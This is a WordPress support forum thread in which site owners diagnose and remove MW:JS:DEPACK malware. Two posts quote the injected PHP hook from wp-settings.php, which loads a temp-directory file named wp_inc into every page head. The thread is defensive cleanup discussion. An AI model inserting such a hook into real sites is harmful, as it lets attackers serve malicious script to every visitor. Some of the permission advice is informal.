WordPress.org

Ready to get started?Download WordPress

Forums

Virus on my site?? Please help! (12 posts)

  1. daniel7rusu
    Member
    Posted 2 years ago #

    Avast shows a virus on our site: kayzoe.com.

    I ran 2 scans:

    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/security-report/?page=www.kayzoe.com

    They both show problems. Sucuri shows this malware: http://sucuri.net/malware/entry/MW:JS:DEPACK, Unmask shows: http://dtym7iokkjlif.cloudfront.net/dough/1.0/recipe.js

    Please help, what do I need to do?

  2. Samuel B
    moderator
    Posted 2 years ago #

  3. JonBon3386
    Member
    Posted 2 years ago #

    I'm having the same kind of problems on all of my sites today. They were all fine the last time I checked them a few days ago... Any others having this issue?

  4. kastnercreative
    Member
    Posted 2 years ago #

    Yeah same thing has happened to me... can't really find where the malicious code is coming from - pulling my hair out right now.

    The only file that has changed on the entire site in the last 24 hours is wp-settings.php and I can't see anything unusual in there...

    Update: Ok, well I replaced my wp-settings.php with an older version I had from about a month ago and it seems to have removed the malicious script tag that was being appended to the page headers....

    This seems to be the only lines of code that were different...?? Anyone able to decypher what this function is doing?

    303 function check_wordpress(){
    304	$t_d = sys_get_temp_dir();
    305	if(file_exists($t_d . '/wp_inc')){
    306	readfile($t_d . '/wp_inc');
    307	}
    308	}
    309	add_action('wp_head', 'check_wordpress');
    310
    311	do_action( 'init' );
  5. victorciobanu
    Member
    Posted 2 years ago #

    Happend to me too server-wide (about 30 wordpress installs were affected).
    Managed to fix everything in about 10 minutes and written an article about how to fix the issue on my blog : How to Remove MW:JS:DEPACK

    To answer kastnercrative's question your server is infected mate (wp_inc file can be found in /tmp folder) either remove the lines in the wp-settings or the code in the wp_inc file.

  6. JeanetteM
    Member
    Posted 2 years ago #

    @victorciobanu Thanks for that tutorial. I did the first part and it seems to have cleared the problem of malware showing up on the scans.

    However, the second part (step 9), I am unclear how to do. I'm not a programmer nor knowledgeable with code.

    How do you remove the code and the file from the server ? Well SSH into you your machine using Putty or whatever you like best, login as root (su) and run MC (Midnight Commander) (if you dont have it on your linux server install it using “wget mc” or whatever the command is on your linux (i use a mandriva distro)
    After you are in MC go at the top level and go to Command=> Find file => Filename : wp_inc Let MC look for it and when it finds it (in your /tmp folder, edit the file (F4) and delete the malware from it. And you are done ! Pat yourself on your shoulder for being a super admin

    I can't quite pat myself on the back yet. lol! Do you mean to log into our host provider's server? I have never used SSH or Putty before. I do most everything from the control panel of my host, and I try to do very minor stuff as in the first part of your tutorial.

  7. victorciobanu
    Member
    Posted 2 years ago #

    @JeanetteM sorry for being unclear

    I run my own server so I have full rights on it so I can access it as root and in my case the /tmp folder of the machine (linux server) was infected !

    - this is not the case when you use shared hosting provided to you by a 3'rd party.

    When you use a host's server a /tmp folder is created just for you and in theory (only) in that /tmp folder ( look for in in your root not in /www/...) you should find a wp_inc file. Replace that wp_inc file with a blank one and set it to readonly (chmod 444) so this does not happen again.

    This however only fixes this particular issue. You probably still can have other files infected so my best bet would be to also chmod 444 (readonly) the wp-settings.php file in your wordpress install, to prevent it from being infected again. But REMEMBER you did this, since when you upgrade your wordpress this file will not get overwritten (updated) and all hell can break lose,

  8. JeanetteM
    Member
    Posted 2 years ago #

    @victorciobanu thanks for the prompt reply. I will try to look for the /tmp folder or talk to my host provider. I think I need to talk to them anyway as I also have been getting a lot more 500 server errors than usual.

    btw, if we make the wp-settings.php file readonly, would we have to remember to manually update this file every time we update wordpress then?

  9. victorciobanu
    Member
    Posted 2 years ago #

    @JeanetteM
    either manually update it or just remember to switch it back to 644 (owner has permission to write) before updating the wordpress install.

    About the 500 server error, I would recommend backing up your site (sql-database/and files) immediately since the issues might be related .

    I have a horror story for you ; a while back (3 weeks) a similar malware code affected one of my wordpress sites created for a client and hosted on justhost and when this issue arose, justhost deleted the sql database. no warnings no nothing ... and yes, i did not have a backup :(

    I'm not saying that this is the case with your site, but better safe than sorry .

    ALSO tho whom might concern the error
    Parse error: syntax error, unexpected '<' in /path/www/genericsite.tld/wp-settings.php on line 131 is also caused by this malware ; it affects old wordpress installs where the insertion of

    function check_wordpress(){
    $t_d = sys_get_temp_dir();
    if(file_exists($t_d . ‘/wp_inc’)){
    readfile($t_d . ‘/wp_inc’);
    }
    }
    add_action(‘wp_head’, ‘check_wordpress’);
    do_action( ‘init’ );

    broke the file.

  10. kastnercreative
    Member
    Posted 2 years ago #

    Weird, I cleaned the code out of my wp-settings.php yesterday and that fixed it.

    However I can't find the wp_inc file or folder in the tmp folder on the server... weird, I wonder maybe if it's been cleaned up by my hosting providers' virus scanning... odd.

  11. JeanetteM
    Member
    Posted 2 years ago #

    @victorciobanu thanks for the warning! I will be more diligent with backups especially after this bout with malwares.

    Last night, my host shut down all my sites (after Google had removed the ban) because of the malware issues. Luckily, they did not just delete the databases. They were nice enough to scan it for me and gave me a list of infected files to clean up. I did that and have my sites back up this morning.

  12. 82concepts
    Member
    Posted 2 years ago #

    Here is another link that goes into detail about the situation. The comments are similar to here but both may progress with new advice.

    Also, I could not find the wp_inc file at all, I am going to send a notice to my host to make sure it did not go to their root folders. I'm praying that the malicious code was only in the settings file. Changing the permissions to chmod 444 on the settings may help a little, as well.

    http://www.victorciobanu.com/how-to-remove-mwjsdepack/

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.